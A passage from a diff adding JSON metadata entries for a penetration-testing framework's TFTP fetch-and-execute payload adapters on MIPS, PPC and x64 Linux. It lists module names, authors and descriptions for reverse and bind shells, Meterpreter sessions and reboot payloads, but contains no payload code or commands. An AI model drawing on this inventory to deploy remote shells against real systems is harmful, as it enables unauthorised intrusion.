"payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/exec", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/reboot": { + "name": "TFTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/tftp/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/reboot", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsbe/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsbe/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsbe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsbe", + "adapted_refname": "linux/mipsbe/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/exec", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/reboot": { + "name": "TFTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/tftp/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/reboot", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/tftp/mipsle/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mipsle/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mipsle", + "adapted_refname": "linux/mipsle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:03 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/ppc/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:03 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/ppc/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an PPC payload from an TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:03 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc", + "adapted_refname": "linux/ppc/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:08 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64", + "adapted_refname": "linux/ppc64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64/shell_find_port": { + "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/tftp/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from a TFTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:08 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64", + "adapted_refname": "linux/ppc64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an PPC64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-12 15:52:08 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64", + "adapted_refname": "linux/ppc64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a PPC64LE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-02-19 18:10:55 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/ppc64le.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/ppc64le", + "adapted_refname": "linux/ppc64le/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/x64/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + 